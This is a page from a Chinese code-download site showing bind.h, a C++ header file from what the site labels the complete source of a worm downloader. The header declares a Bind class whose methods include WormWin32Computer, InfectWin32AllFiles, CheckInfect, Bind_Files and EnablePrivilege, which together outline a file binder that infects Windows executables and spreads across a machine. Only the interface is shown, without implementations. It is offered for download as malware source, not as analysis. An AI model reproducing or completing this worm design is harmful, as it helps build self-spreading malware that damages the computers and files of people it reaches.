⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 bind.h

📁 黑色技术蠕虫下载者的完整源码
💻 H
字号:
// Bind.h: interface for the Bind class.
//
//////////////////////////////////////////////////////////////////////

#if !defined(AFX_BIND_H__FAE5C6FD_8881_48CC_A389_28044B6B8B8F__INCLUDED_)
#define AFX_BIND_H__FAE5C6FD_8881_48CC_A389_28044B6B8B8F__INCLUDED_

#if _MSC_VER > 1000
#pragma once
#endif // _MSC_VER > 1000

#include "StructDef.h"

class Bind  
{
public:
	void WormWin32Computer();
	void Unbind_and_Run();
	bool Bind_Files(char* strSourExe);
	Bind(char* strBaseExe,char* strShellExe);
	virtual ~Bind();
	bool CheckInfect(char* strExePath);
private:
	void InfectWin32AllFiles(char * lpPath);
	void UnbindFile(char* strSourcFile,char* strDesFile,unsigned int iBegin,unsigned int iSize);
	void Create_Process(const char* temp_exe, BOOL async);
	
	bool CompFile(FILE* DesFileIO,char* strSourFile);
	int SplitFilePath(CString strFilePath,CString &strOutFileName);
	void BackUpFile(char* strSourFile,char* strDesFile);
	BOOL EnablePrivilege();
	
	char my_name[256];
	char File1[256];
	BYTE *buf ;
};

#endif // !defined(AFX_BIND_H__FAE5C6FD_8881_48CC_A389_28044B6B8B8F__INCLUDED_)

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -